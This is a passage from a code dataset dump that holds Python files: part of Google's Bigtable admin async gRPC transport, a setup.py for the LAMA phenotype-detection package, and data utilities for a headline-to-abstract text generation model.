self._stubs:\n self._stubs[\"undelete_table\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/UndeleteTable\",\n request_serializer=bigtable_table_admin.UndeleteTableRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"undelete_table\"]\n\n @property\n def modify_column_families(\n self,\n ) -> Callable[\n [bigtable_table_admin.ModifyColumnFamiliesRequest], Awaitable[table.Table]\n ]:\n r\"\"\"Return a callable for the modify column families method over gRPC.\n\n Performs a series of column family modifications on\n the specified table. 
Either all or none of the\n modifications will occur before this method returns, but\n data requests received prior to that point may see a\n table where only some modifications have taken effect.\n\n Returns:\n Callable[[~.ModifyColumnFamiliesRequest],\n Awaitable[~.Table]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"modify_column_families\" not in self._stubs:\n self._stubs[\"modify_column_families\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/ModifyColumnFamilies\",\n request_serializer=bigtable_table_admin.ModifyColumnFamiliesRequest.serialize,\n response_deserializer=table.Table.deserialize,\n )\n return self._stubs[\"modify_column_families\"]\n\n @property\n def drop_row_range(\n self,\n ) -> Callable[\n [bigtable_table_admin.DropRowRangeRequest], Awaitable[empty_pb2.Empty]\n ]:\n r\"\"\"Return a callable for the drop row range method over gRPC.\n\n Permanently drop/delete a row range from a specified\n table. The request can specify whether to delete all\n rows in a table, or only those that match a particular\n prefix.\n\n Returns:\n Callable[[~.DropRowRangeRequest],\n Awaitable[~.Empty]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"drop_row_range\" not in self._stubs:\n self._stubs[\"drop_row_range\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/DropRowRange\",\n request_serializer=bigtable_table_admin.DropRowRangeRequest.serialize,\n response_deserializer=empty_pb2.Empty.FromString,\n )\n return self._stubs[\"drop_row_range\"]\n\n @property\n def generate_consistency_token(\n self,\n ) -> Callable[\n [bigtable_table_admin.GenerateConsistencyTokenRequest],\n Awaitable[bigtable_table_admin.GenerateConsistencyTokenResponse],\n ]:\n r\"\"\"Return a callable for the generate consistency token method over gRPC.\n\n Generates a consistency token for a Table, which can\n be used in CheckConsistency to check whether mutations\n to the table that finished before this call started have\n been replicated. 
The tokens will be available for 90\n days.\n\n Returns:\n Callable[[~.GenerateConsistencyTokenRequest],\n Awaitable[~.GenerateConsistencyTokenResponse]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"generate_consistency_token\" not in self._stubs:\n self._stubs[\"generate_consistency_token\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/GenerateConsistencyToken\",\n request_serializer=bigtable_table_admin.GenerateConsistencyTokenRequest.serialize,\n response_deserializer=bigtable_table_admin.GenerateConsistencyTokenResponse.deserialize,\n )\n return self._stubs[\"generate_consistency_token\"]\n\n @property\n def check_consistency(\n self,\n ) -> Callable[\n [bigtable_table_admin.CheckConsistencyRequest],\n Awaitable[bigtable_table_admin.CheckConsistencyResponse],\n ]:\n r\"\"\"Return a callable for the check consistency method over gRPC.\n\n Checks replication consistency based on a consistency\n token, that is, if replication has caught up based on\n the conditions specified in the token and the check\n request.\n\n Returns:\n Callable[[~.CheckConsistencyRequest],\n Awaitable[~.CheckConsistencyResponse]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"check_consistency\" not in self._stubs:\n self._stubs[\"check_consistency\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/CheckConsistency\",\n request_serializer=bigtable_table_admin.CheckConsistencyRequest.serialize,\n response_deserializer=bigtable_table_admin.CheckConsistencyResponse.deserialize,\n )\n return self._stubs[\"check_consistency\"]\n\n @property\n def snapshot_table(\n self,\n ) -> Callable[\n [bigtable_table_admin.SnapshotTableRequest], Awaitable[operations_pb2.Operation]\n ]:\n r\"\"\"Return a callable for the snapshot table method over gRPC.\n\n Creates a new snapshot in the specified cluster from\n the specified source table. The cluster and the table\n must be in the same instance.\n Note: This is a private alpha release of Cloud Bigtable\n snapshots. This feature is not currently available to\n most Cloud Bigtable customers. This feature might be\n changed in backward-incompatible ways and is not\n recommended for production use. 
It is not subject to any\n SLA or deprecation policy.\n\n Returns:\n Callable[[~.SnapshotTableRequest],\n Awaitable[~.Operation]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"snapshot_table\" not in self._stubs:\n self._stubs[\"snapshot_table\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/SnapshotTable\",\n request_serializer=bigtable_table_admin.SnapshotTableRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"snapshot_table\"]\n\n @property\n def get_snapshot(\n self,\n ) -> Callable[[bigtable_table_admin.GetSnapshotRequest], Awaitable[table.Snapshot]]:\n r\"\"\"Return a callable for the get snapshot method over gRPC.\n\n Gets metadata information about the specified\n snapshot.\n Note: This is a private alpha release of Cloud Bigtable\n snapshots. This feature is not currently available to\n most Cloud Bigtable customers. This feature might be\n changed in backward-incompatible ways and is not\n recommended for production use. It is not subject to any\n SLA or deprecation policy.\n\n Returns:\n Callable[[~.GetSnapshotRequest],\n Awaitable[~.Snapshot]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"get_snapshot\" not in self._stubs:\n self._stubs[\"get_snapshot\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/GetSnapshot\",\n request_serializer=bigtable_table_admin.GetSnapshotRequest.serialize,\n response_deserializer=table.Snapshot.deserialize,\n )\n return self._stubs[\"get_snapshot\"]\n\n @property\n def list_snapshots(\n self,\n ) -> Callable[\n [bigtable_table_admin.ListSnapshotsRequest],\n Awaitable[bigtable_table_admin.ListSnapshotsResponse],\n ]:\n r\"\"\"Return a callable for the list snapshots method over gRPC.\n\n Lists all snapshots associated with the specified\n cluster.\n Note: This is a private alpha release of Cloud Bigtable\n snapshots. This feature is not currently available to\n most Cloud Bigtable customers. This feature might be\n changed in backward-incompatible ways and is not\n recommended for production use. 
It is not subject to any\n SLA or deprecation policy.\n\n Returns:\n Callable[[~.ListSnapshotsRequest],\n Awaitable[~.ListSnapshotsResponse]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"list_snapshots\" not in self._stubs:\n self._stubs[\"list_snapshots\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/ListSnapshots\",\n request_serializer=bigtable_table_admin.ListSnapshotsRequest.serialize,\n response_deserializer=bigtable_table_admin.ListSnapshotsResponse.deserialize,\n )\n return self._stubs[\"list_snapshots\"]\n\n @property\n def delete_snapshot(\n self,\n ) -> Callable[\n [bigtable_table_admin.DeleteSnapshotRequest], Awaitable[empty_pb2.Empty]\n ]:\n r\"\"\"Return a callable for the delete snapshot method over gRPC.\n\n Permanently deletes the specified snapshot.\n Note: This is a private alpha release of Cloud Bigtable\n snapshots. This feature is not currently available to\n most Cloud Bigtable customers. This feature might be\n changed in backward-incompatible ways and is not\n recommended for production use. It is not subject to any\n SLA or deprecation policy.\n\n Returns:\n Callable[[~.DeleteSnapshotRequest],\n Awaitable[~.Empty]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"delete_snapshot\" not in self._stubs:\n self._stubs[\"delete_snapshot\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/DeleteSnapshot\",\n request_serializer=bigtable_table_admin.DeleteSnapshotRequest.serialize,\n response_deserializer=empty_pb2.Empty.FromString,\n )\n return self._stubs[\"delete_snapshot\"]\n\n @property\n def create_backup(\n self,\n ) -> Callable[\n [bigtable_table_admin.CreateBackupRequest], Awaitable[operations_pb2.Operation]\n ]:\n r\"\"\"Return a callable for the create backup method over gRPC.\n\n Starts creating a new Cloud Bigtable Backup. The returned backup\n [long-running operation][google.longrunning.Operation] can be\n used to track creation of the backup. 
The\n [metadata][google.longrunning.Operation.metadata] field type is\n [CreateBackupMetadata][google.bigtable.admin.v2.CreateBackupMetadata].\n The [response][google.longrunning.Operation.response] field type\n is [Backup][google.bigtable.admin.v2.Backup], if successful.\n Cancelling the returned operation will stop the creation and\n delete the backup.\n\n Returns:\n Callable[[~.CreateBackupRequest],\n Awaitable[~.Operation]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"create_backup\" not in self._stubs:\n self._stubs[\"create_backup\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/CreateBackup\",\n request_serializer=bigtable_table_admin.CreateBackupRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"create_backup\"]\n\n @property\n def get_backup(\n self,\n ) -> Callable[[bigtable_table_admin.GetBackupRequest], Awaitable[table.Backup]]:\n r\"\"\"Return a callable for the get backup method over gRPC.\n\n Gets metadata on a pending or completed Cloud\n Bigtable Backup.\n\n Returns:\n Callable[[~.GetBackupRequest],\n Awaitable[~.Backup]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"get_backup\" not in self._stubs:\n self._stubs[\"get_backup\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/GetBackup\",\n request_serializer=bigtable_table_admin.GetBackupRequest.serialize,\n response_deserializer=table.Backup.deserialize,\n )\n return self._stubs[\"get_backup\"]\n\n @property\n def update_backup(\n self,\n ) -> Callable[[bigtable_table_admin.UpdateBackupRequest], Awaitable[table.Backup]]:\n r\"\"\"Return a callable for the update backup method over gRPC.\n\n Updates a pending or completed Cloud Bigtable Backup.\n\n Returns:\n Callable[[~.UpdateBackupRequest],\n Awaitable[~.Backup]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"update_backup\" not in self._stubs:\n self._stubs[\"update_backup\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/UpdateBackup\",\n request_serializer=bigtable_table_admin.UpdateBackupRequest.serialize,\n response_deserializer=table.Backup.deserialize,\n )\n return self._stubs[\"update_backup\"]\n\n @property\n def delete_backup(\n self,\n ) -> Callable[\n [bigtable_table_admin.DeleteBackupRequest], Awaitable[empty_pb2.Empty]\n ]:\n r\"\"\"Return a callable for the delete backup method over gRPC.\n\n Deletes a pending or completed Cloud Bigtable backup.\n\n Returns:\n Callable[[~.DeleteBackupRequest],\n Awaitable[~.Empty]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for 
each.\n if \"delete_backup\" not in self._stubs:\n self._stubs[\"delete_backup\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/DeleteBackup\",\n request_serializer=bigtable_table_admin.DeleteBackupRequest.serialize,\n response_deserializer=empty_pb2.Empty.FromString,\n )\n return self._stubs[\"delete_backup\"]\n\n @property\n def list_backups(\n self,\n ) -> Callable[\n [bigtable_table_admin.ListBackupsRequest],\n Awaitable[bigtable_table_admin.ListBackupsResponse],\n ]:\n r\"\"\"Return a callable for the list backups method over gRPC.\n\n Lists Cloud Bigtable backups. Returns both completed\n and pending backups.\n\n Returns:\n Callable[[~.ListBackupsRequest],\n Awaitable[~.ListBackupsResponse]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"list_backups\" not in self._stubs:\n self._stubs[\"list_backups\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/ListBackups\",\n request_serializer=bigtable_table_admin.ListBackupsRequest.serialize,\n response_deserializer=bigtable_table_admin.ListBackupsResponse.deserialize,\n )\n return self._stubs[\"list_backups\"]\n\n @property\n def restore_table(\n self,\n ) -> Callable[\n [bigtable_table_admin.RestoreTableRequest], Awaitable[operations_pb2.Operation]\n ]:\n r\"\"\"Return a callable for the restore table method over gRPC.\n\n Create a new table by restoring from a completed backup. The\n returned table [long-running\n operation][google.longrunning.Operation] can be used to track\n the progress of the operation, and to cancel it. 
The\n [metadata][google.longrunning.Operation.metadata] field type is\n [RestoreTableMetadata][google.bigtable.admin.RestoreTableMetadata].\n The [response][google.longrunning.Operation.response] type is\n [Table][google.bigtable.admin.v2.Table], if successful.\n\n Returns:\n Callable[[~.RestoreTableRequest],\n Awaitable[~.Operation]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"restore_table\" not in self._stubs:\n self._stubs[\"restore_table\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/RestoreTable\",\n request_serializer=bigtable_table_admin.RestoreTableRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"restore_table\"]\n\n @property\n def copy_backup(\n self,\n ) -> Callable[\n [bigtable_table_admin.CopyBackupRequest], Awaitable[operations_pb2.Operation]\n ]:\n r\"\"\"Return a callable for the copy backup method over gRPC.\n\n Copy a Cloud Bigtable backup to a new backup in the\n destination cluster located in the destination instance\n and project.\n\n Returns:\n Callable[[~.CopyBackupRequest],\n Awaitable[~.Operation]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"copy_backup\" not in self._stubs:\n self._stubs[\"copy_backup\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/CopyBackup\",\n request_serializer=bigtable_table_admin.CopyBackupRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"copy_backup\"]\n\n @property\n def get_iam_policy(\n self,\n ) -> Callable[[iam_policy_pb2.GetIamPolicyRequest], Awaitable[policy_pb2.Policy]]:\n r\"\"\"Return a callable for the get iam policy method over gRPC.\n\n Gets the access control policy for a Table or Backup\n resource. Returns an empty policy if the resource exists\n but does not have a policy set.\n\n Returns:\n Callable[[~.GetIamPolicyRequest],\n Awaitable[~.Policy]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"get_iam_policy\" not in self._stubs:\n self._stubs[\"get_iam_policy\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/GetIamPolicy\",\n request_serializer=iam_policy_pb2.GetIamPolicyRequest.SerializeToString,\n response_deserializer=policy_pb2.Policy.FromString,\n )\n return self._stubs[\"get_iam_policy\"]\n\n @property\n def set_iam_policy(\n self,\n ) -> Callable[[iam_policy_pb2.SetIamPolicyRequest], Awaitable[policy_pb2.Policy]]:\n r\"\"\"Return a callable for the set iam policy method over gRPC.\n\n Sets the access control policy on a Table or Backup\n resource. 
Replaces any existing policy.\n\n Returns:\n Callable[[~.SetIamPolicyRequest],\n Awaitable[~.Policy]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"set_iam_policy\" not in self._stubs:\n self._stubs[\"set_iam_policy\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/SetIamPolicy\",\n request_serializer=iam_policy_pb2.SetIamPolicyRequest.SerializeToString,\n response_deserializer=policy_pb2.Policy.FromString,\n )\n return self._stubs[\"set_iam_policy\"]\n\n @property\n def test_iam_permissions(\n self,\n ) -> Callable[\n [iam_policy_pb2.TestIamPermissionsRequest],\n Awaitable[iam_policy_pb2.TestIamPermissionsResponse],\n ]:\n r\"\"\"Return a callable for the test iam permissions method over gRPC.\n\n Returns permissions that the caller has on the\n specified Table or Backup resource.\n\n Returns:\n Callable[[~.TestIamPermissionsRequest],\n Awaitable[~.TestIamPermissionsResponse]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"test_iam_permissions\" not in self._stubs:\n self._stubs[\"test_iam_permissions\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/TestIamPermissions\",\n request_serializer=iam_policy_pb2.TestIamPermissionsRequest.SerializeToString,\n response_deserializer=iam_policy_pb2.TestIamPermissionsResponse.FromString,\n )\n return self._stubs[\"test_iam_permissions\"]\n\n def close(self):\n return self.grpc_channel.close()\n\n\n__all__ = (\"BigtableTableAdminGrpcAsyncIOTransport\",)\n","sub_path":"google/cloud/bigtable_admin_v2/services/bigtable_table_admin/transports/grpc_asyncio.py","file_name":"grpc_asyncio.py","file_ext":"py","file_size_in_byte":45402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
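Every RPC property in the transport above follows the same memoized-stub pattern: build the `unary_unary` callable once, cache it in `self._stubs`, and return the cached entry on every later access. A dependency-free sketch of that caching shape (class and names here are illustrative, not part of the real transport):

```python
# Generic memoized-factory pattern, mirroring the _stubs caching above.
from typing import Callable, Dict

class LazyStubs:
    def __init__(self, stub_factory: Callable[[str], Callable]):
        self._make = stub_factory
        self._stubs: Dict[str, Callable] = {}

    def get(self, rpc_name: str) -> Callable:
        # Create on first use; every later call returns the same object.
        if rpc_name not in self._stubs:
            self._stubs[rpc_name] = self._make(rpc_name)
        return self._stubs[rpc_name]

stubs = LazyStubs(lambda name: (lambda request: f"{name}({request})"))
assert stubs.get("CreateTable") is stubs.get("CreateTable")  # cached
print(stubs.get("CreateTable")("req"))  # CreateTable(req)
```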
{"seq_id":"29462159","text":"# coding: utf-8\n\nfrom setuptools import setup, find_packages\nfrom pathlib import Path\n\n# Get the __version__ dunder without importing lama\nversion_file = Path(__file__).resolve().parent / 'lama' / 'version.py'\nexec(open(version_file).read())\n\n\nsetup(\n name='lama_phenotype_detection',\n download_url=f'https://github.com/mpi2/lama/archive/{__version__}.tar.gz',\n version=__version__,\n packages=find_packages(exclude=(\"dev\",)), # trailing comma: exclude must be a tuple of patterns, not a bare string\n package_data={'': ['current_commit',\n 'stats/rscripts/lmFast.R',\n 'stats/rscripts/r_padjust.R']}, # Puts it in the wheel dist. MANIFEST.in gets it in source dist\n include_package_data=True,\n install_requires=[\n 'appdirs',\n 'matplotlib>=2.2.0',\n 'numpy>=1.15.0',\n 'pandas>=1.1.0',\n 'scikit-learn>=0.19.2',\n 'scipy>=1.1.0',\n 'scikit-image==0.17.2',\n 'seaborn>=0.9.0',\n 'statsmodels>=0.9.0',\n 'PyYAML>=3.13',\n 'SimpleITK>=1.1.0',\n 'filelock',\n 'psutil',\n 'logzero',\n 'addict',\n 'toml',\n 'pynrrd',\n 'pytest',\n 'tqdm',\n 'gitpython'\n ],\n extras_require={\n 'dev': ['pyradiomics'],\n },\n url='https://github.com/mpi2/LAMA',\n license='Apache2',\n author='Neil Horner',\n author_email='n.horner@har.mrc.ac.uk, bit@har.mrc.ac.uk',\n description='Phenotype detection pipeline for finding abnormalities in mouse embryos',\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n keywords=['image processing', 'bioinformatics', 'phenotype'],\n entry_points ={\n 'console_scripts': [\n 'lama_reg=lama.scripts.lama_reg:main',\n 'lama_get_test_data=lama.scripts.lama_get_test_data:main',\n 'lama_get_walkthrough_data=lama.scripts.lama_get_walkthrough_data:main',\n 'lama_job_runner=lama.scripts.lama_job_runner:main',\n 'lama_permutation_stats=lama.scripts.lama_permutation_stats:main',\n 'lama_stats=lama.scripts.lama_stats:main',\n 'lama_pad_volumes=lama.utilities.lama_pad_volumes:main',\n 'lama_convert_16_to_8=lama.utilities.lama_convert_16_to_8:main',\n 'lama_img_info=lama.utilities.lama_img_info:main'\n ]\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
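The setup.py above reads `lama/version.py` and `exec`s it to obtain `__version__` without importing the package (which would pull in heavy dependencies at install time). A tiny self-contained demonstration of that pattern; the file name and version string here are made up, and the sketch execs into an explicit namespace dict where the record execs into module globals:

```python
# Demonstrates the exec-based version trick used in the setup.py above.
from pathlib import Path
import tempfile

with tempfile.TemporaryDirectory() as tmp:
    version_file = Path(tmp) / "version.py"
    version_file.write_text("__version__ = '1.2.3'\n")
    namespace = {}
    exec(version_file.read_text(), namespace)  # no import machinery involved
    print(namespace["__version__"])            # 1.2.3
```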
\"\"\"\n pretrained_words = set()\n for word in en_model.vocab:\n pretrained_words.add(word)\n\n arr = [0] * len(word2idx)\n for word in word2idx:\n index = word2idx[word]\n if word in pretrained_words:\n arr[index] = en_model[word]\n else:\n arr[index] = np.random.uniform(-1.0, 1.0, embedding_size)\n\n \"\"\" Creating a numpy dictionary for the index -> embedding mapping \"\"\"\n arr = np.array(arr)\n \"\"\" Add the word embeddings to the empty PyTorch Embedding object \"\"\"\n pytorch_embedding.weight.data.copy_(torch.from_numpy(arr))\n return pytorch_embedding\n\n#Transforms a Corpus into lists of word indices.\nclass Vectorizer:\n def __init__(self, max_words=None, min_frequency=None, start_end_tokens=True, maxlen=None):\n self.vocabulary = None\n self.vocabulary_size = 0\n self.word2idx = dict()\n self.idx2word = dict()\n #most common words\n self.max_words = max_words\n #least common words\n self.min_frequency = min_frequency\n self.start_end_tokens = start_end_tokens\n self.maxlen = maxlen\n\n def _find_max_sentence_length(self, corpus, template):\n if not template:\n self.maxlen = max(len(sent) for document in corpus for sent in document)\n else:\n self.maxlen = max(len(sent) for sent in corpus)\n if self.start_end_tokens:\n self.maxlen += 2\n\n def _build_vocabulary(self, corpus, template):\n if not template:\n vocabulary = Counter(word for document in corpus for sent in document for word in sent)\n else:\n vocabulary = Counter(word for sent in corpus for word in sent)\n if self.max_words:\n vocabulary = {word: freq for word,\n freq in vocabulary.most_common(self.max_words)}\n if self.min_frequency:\n vocabulary = {word: freq for word, freq in vocabulary.items()\n if freq >= self.min_frequency}\n self.vocabulary = vocabulary\n self.vocabulary_size = len(vocabulary) + 2 # padding and unk tokens\n if self.start_end_tokens:\n self.vocabulary_size += 2\n\n def _build_word_index(self):\n self.word2idx[''] = 3\n self.word2idx[''] = 0\n\n if self.start_end_tokens:\n self.word2idx[''] = 1\n self.word2idx[''] = 2\n\n offset = len(self.word2idx)\n for idx, word in enumerate(self.vocabulary):\n self.word2idx[word] = idx + offset\n self.idx2word = {idx: word for word, idx in self.word2idx.items()}\n\n def fit(self, corpus, template = False):\n if not self.maxlen:\n self._find_max_sentence_length(corpus, template)\n self._build_vocabulary(corpus, template)\n self._build_word_index()\n\n def add_start_end(self, vector):\n vector.append(self.word2idx[''])\n return [self.word2idx['']] + vector\n\n def transform_sentence(self, sentence):\n \"\"\"\n Vectorize a single sentence\n \"\"\"\n vector = [self.word2idx.get(word, 3) for word in sentence]\n if self.start_end_tokens:\n vector = self.add_start_end(vector)\n return vector\n\n def transform(self, corpus, template = False):\n \"\"\"\n Vectorizes a corpus in the form of a list of lists.\n A corpus is a list of documents and a document is a list of sentence.\n \"\"\"\n vcorpus = []\n if not template:\n for document in corpus:\n vcorpus.append([self.transform_sentence(sentence) for sentence in document])\n else:\n vcorpus.extend([self.transform_sentence(sentence) for sentence in corpus])\n return vcorpus\n\nclass headline2abstractdataset(Dataset):\n def __init__(self, path, vectorizer, USE_CUDA=torch.cuda.is_available(), max_len=200):\n self.head_len = 0\n self.abs_len = 0\n self.max_len = max_len\n self.max_context_length = -1\n self.context_vectorizer = {}\n self.corpus, self.topics_corpus = self._read_corpus(path)\n self.vectorizer = vectorizer\n 
\nclass headline2abstractdataset(Dataset):\n def __init__(self, path, vectorizer, USE_CUDA=torch.cuda.is_available(), max_len=200):\n self.head_len = 0\n self.abs_len = 0\n self.max_len = max_len\n self.max_context_length = -1\n self.context_vectorizer = {}\n self.corpus, self.topics_corpus = self._read_corpus(path)\n self.vectorizer = vectorizer\n self.data = self._vectorize_corpus()\n self._initial_corpus()\n self.USE_CUDA = USE_CUDA\n\n def pad_sentence_vector(self, vector, maxlen, pad_value=0):\n org_length = len(vector)\n padding = maxlen - org_length\n vector.extend([pad_value] * padding)\n vector.append(org_length)\n return vector\n\n def _initial_corpus(self):\n old = []\n for i, j in zip(self.data, self.topics_corpus):\n source = i[0]\n target = i[1]\n vectorized_topics = j\n if len(source) > self.head_len:\n self.head_len = len(source)\n if len(target) <= self.max_len:\n if len(target) > self.abs_len:\n self.abs_len = len(target)\n else:\n target = target[:self.max_len-1]\n target.append(1) # word2idx['<EOS>'] = 1 (token name reconstructed)\n self.abs_len = len(target)\n old.append((source[1:-1], target, vectorized_topics))\n old.sort(key = lambda x: len(x[0]), reverse = True)\n corpus = []\n for source, target, vectorized_topics in old:\n vectorized_topics = self.pad_sentence_vector(vectorized_topics, self.max_context_length, pad_value=self.context_vectorizer['<pad>'])\n team = [len(source), len(target), self.pad_sentence_vector(source, self.head_len), self.pad_sentence_vector(target, self.abs_len), vectorized_topics]\n corpus.append(team)\n self.data = corpus\n\n def _read_corpus(self, path):\n abstracts = []\n headlines = []\n topics = []\n i = 0\n with open(path, encoding=\"utf-8\") as f:\n for line in f:\n j = json.loads(line)\n headlines.append(j[\"title\"])\n abstracts.append(j[\"abstract\"])\n if \"topics\" in j:\n topics.append(j[\"topics\"])\n i += 1\n corpus = []\n topics_v = []\n for i in range(len(abstracts)):\n if len(headlines[i]) > 0 and len(abstracts[i]) > 0:\n h_a_pair = []\n h_a_pair.append(self._tokenize_word(headlines[i]))\n h_a_pair.append(self._tokenize_word(abstracts[i]))\n if len(h_a_pair) > 1:\n corpus.append(h_a_pair)\n vectorized_topics = []\n if topics:\n for t in topics[i]:\n t = t.lower()\n if t not in self.context_vectorizer:\n self.context_vectorizer[t] = len(self.context_vectorizer)\n vectorized_topics.append(self.context_vectorizer[t])\n self.max_context_length = max(self.max_context_length, len(vectorized_topics))\n topics_v.append(vectorized_topics)\n self.context_vectorizer['<pad>'] = len(self.context_vectorizer) # pad-token name reconstructed\n return corpus, topics_v\n\n def _tokenize_word(self, sentence):\n result = []\n for word in sentence.split():\n if word:\n result.append(word)\n return result\n\n # sentence to word ids\n def _vectorize_corpus(self):\n if not self.vectorizer.vocabulary:\n self.vectorizer.fit(self.corpus)\n return self.vectorizer.transform(self.corpus)\n\n def __getitem__(self, index):\n len_s, len_t, source, target, topics = self.data[index]\n source = torch.LongTensor(source)\n topics = torch.LongTensor(topics)\n target = torch.LongTensor(target)\n if self.USE_CUDA:\n source = source.cuda()\n target = target.cuda()\n topics = topics.cuda()\n return source, target, len_s, topics\n\n def __len__(self):\n return len(self.data)\n","sub_path":"Writing-editing network/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
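Because `_initial_corpus` pads every source and target to a fixed width (with the true length appended at the end), the dataset collates under a standard DataLoader without a custom `collate_fn`. A smoke-test sketch, assuming it runs in the same module as the `Vectorizer` and `headline2abstractdataset` classes above and that torch is installed (the JSONL rows are fabricated):

```python
# Sketch: Vectorizer and headline2abstractdataset come from the module above.
import json, tempfile
from torch.utils.data import DataLoader

rows = [{"title": "a b", "abstract": "x y z"},
        {"title": "c", "abstract": "x q"}]
with tempfile.NamedTemporaryFile("w", suffix=".jsonl", delete=False) as f:
    f.write("\n".join(json.dumps(r) for r in rows))

ds = headline2abstractdataset(f.name, Vectorizer(start_end_tokens=True),
                              USE_CUDA=False, max_len=50)
for source, target, len_s, topics in DataLoader(ds, batch_size=2):
    # every field is padded to a fixed width, so default collation just works
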